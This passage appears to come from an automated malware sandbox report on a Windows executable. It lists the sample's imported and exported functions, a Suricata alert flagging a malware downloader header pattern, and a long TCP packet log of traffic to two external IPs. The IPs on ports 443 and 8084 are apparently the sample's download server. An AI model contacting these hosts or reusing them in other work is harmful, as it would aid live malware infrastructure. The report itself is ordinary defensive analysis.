AddVectoredContinueHandler, AddVectoredExceptionHandler, AreFileApisANSI, CloseHandle, CreateEventA, CreateFileA, CreateFileMappingA, CreateFileMappingW, CreateFileW, CreateIoCompletionPort, CreateMutexW, CreateThread, CreateWaitableTimerA, CreateWaitableTimerExW, DeleteCriticalSection, DeleteFileA, DeleteFileW, DuplicateHandle, EnterCriticalSection, ExitProcess, FlushFileBuffers, FlushViewOfFile, FormatMessageA, FormatMessageW, FreeEnvironmentStringsW, FreeLibrary, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceA, GetDiskFreeSpaceW, GetEnvironmentStringsW, GetErrorMode, GetFileAttributesA, GetFileAttributesExW, GetFileAttributesW, GetFileSize, GetFullPathNameA, GetFullPathNameW, GetLastError, GetModuleHandleA, GetProcAddress, GetProcessAffinityMask, GetProcessHeap, GetQueuedCompletionStatusEx, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetTempPathA, GetTempPathW, GetThreadContext, GetTickCount, GetVersionExA, GetVersionExW, HeapAlloc, HeapCompact, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSize, HeapValidate, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, LocalFree, LockFile, LockFileEx, MapViewOfFile, MultiByteToWideChar, OutputDebugStringA, OutputDebugStringW, PostQueuedCompletionStatus, QueryPerformanceCounter, RaiseFailFastException, ReadFile, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetEndOfFile, SetErrorMode, SetEvent, SetFilePointer, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TryEnterCriticalSection, UnlockFile, UnlockFileEx, UnmapViewOfFile, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler

msvcrt.dll

___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _localtime64, _lock, _onexit, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, malloc, memchr, memcmp, memcpy, memmove, memset, qsort, realloc, signal, strchr, strcmp, strcspn, strerror, strlen, strncmp, strrchr, strspn, vfprintf, wcslen

Exports

Name	Ordinal	Address
_cgo_dummy_export	1	0x1407d54b0
authorizerTrampoline	2	0x140303db0
callbackTrampoline	3	0x140303b10
commitHookTrampoline	4	0x140303ca0
compareTrampoline	5	0x140303c10
doneTrampoline	6	0x140303bd0
preUpdateHookTrampoline	7	0x140303e30
rollbackHookTrampoline	8	0x140303d00
stepTrampoline	9	0x140303b70
updateHookTrampoline	10	0x140303d40

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T13:31:48.133803+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49705	107.148.62.100	8084	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 13:31:51.033854008 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:51.033906937 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:51.033987045 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:51.034513950 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:51.034531116 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:52.870457888 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:52.871697903 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:52.871721983 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:52.871865988 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:52.871876955 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:52.873361111 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:52.873436928 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:52.885833979 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:52.885917902 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:52.893735886 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:52.893753052 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:52.941493988 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:53.589859009 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:53.589883089 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:53.589960098 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:53.589978933 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:53.590049028 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:53.590795994 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:53.590822935 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:53.590837955 CET	49704	443	192.168.2.5	107.148.51.200
Dec 18, 2024 13:31:53.590845108 CET	443	49704	107.148.51.200	192.168.2.5
Dec 18, 2024 13:31:53.649117947 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:53.769113064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:53.769218922 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:53.769289970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:53.889257908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.280118942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.280607939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.280644894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.280674934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.282432079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.282495022 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.282538891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.284121037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.284168005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.284202099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.285885096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.285955906 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.285979986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.326498032 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.494469881 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.494507074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.494652033 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.498609066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.500107050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.500168085 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.500247002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.508810997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.508872986 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.508946896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.516895056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.516958952 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.519912004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.520066023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.520133972 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.528397083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.528548002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.528619051 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.536739111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.536845922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.536897898 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.545286894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.545361996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.545423985 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.553828955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.553906918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.553993940 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.561955929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.605501890 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.614396095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.667126894 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.686614990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.686732054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.686808109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.690051079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.690078974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.690148115 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.697165012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.708409071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.708471060 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.708532095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.711935043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.711987019 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.713211060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.713412046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.713458061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.720712900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.720769882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.720845938 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.727092981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.729764938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.729825020 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.729985952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.736731052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.736749887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.736793041 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.743653059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.743721008 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.743762970 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.751072884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.751121998 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.751152992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.757916927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.757970095 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.758183956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.764849901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.764903069 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.765228033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.772058964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.772125006 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.772126913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.778523922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.778541088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.778584957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.786047935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.786065102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.786108971 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.792515993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.792576075 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.792766094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.799382925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.799460888 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.799468040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.806600094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.806663990 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.806747913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.813272953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.813343048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.813388109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.820056915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.820118904 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.880511045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.880552053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.880621910 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.883658886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.883740902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.883788109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.889761925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.889815092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.889879942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.895586014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.895603895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.895648003 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.900804996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.900857925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.900899887 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.904546976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.904673100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.904717922 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.909570932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.922466993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.922518969 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.922782898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.924882889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.924937963 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.925667048 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.925769091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.925818920 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.930406094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.931229115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.931274891 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.931291103 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.936062098 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.936116934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.936194897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.939816952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.939862967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.939874887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.943453074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.943528891 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.943571091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.947118998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.947175026 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.947283983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.950784922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.950830936 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.950874090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.953371048 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.953434944 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.953507900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.955852032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.955903053 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.955965996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.958956003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.959003925 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.959079981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.961435080 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.961482048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.961569071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.963829041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.963881016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.963912010 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.966125965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.966176987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.966320992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.968662024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.968679905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.968702078 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.971338987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.971383095 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.971389055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.973726988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.973764896 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.973838091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.976125956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.976171970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.976226091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.978837967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.978893042 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.978908062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.981595039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.981642008 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.981686115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.984426022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.984473944 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.984534025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.986998081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.987045050 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.987128019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.989733934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.989797115 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.989871979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.992845058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.992892027 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.992919922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.995858908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:55.995903969 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:55.995935917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.002887964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.002944946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.070718050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.070852041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.070904016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.071944952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.073095083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.073142052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.073163033 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.075086117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.075138092 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.075228930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.077616930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.077655077 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.077661991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.080117941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.080164909 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.080384016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.082592964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.082638025 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.082707882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.085184097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.085215092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.085226059 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.087651014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.087697029 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.087835073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.090147018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.090195894 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.092850924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.092869043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.092915058 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.094356060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.094368935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.094415903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.096476078 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.096496105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.096541882 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.098551989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.098618984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.098663092 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.114749908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.114851952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.114902020 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.115708113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.115827084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.115873098 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.118021965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.118679047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.118693113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.118722916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.120780945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.120826006 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.120845079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.122276068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.122319937 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.122323990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.124171019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.124214888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.124226093 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.126085043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.126111984 CET	8084	49705	107.148.62.100	192.168.2.5
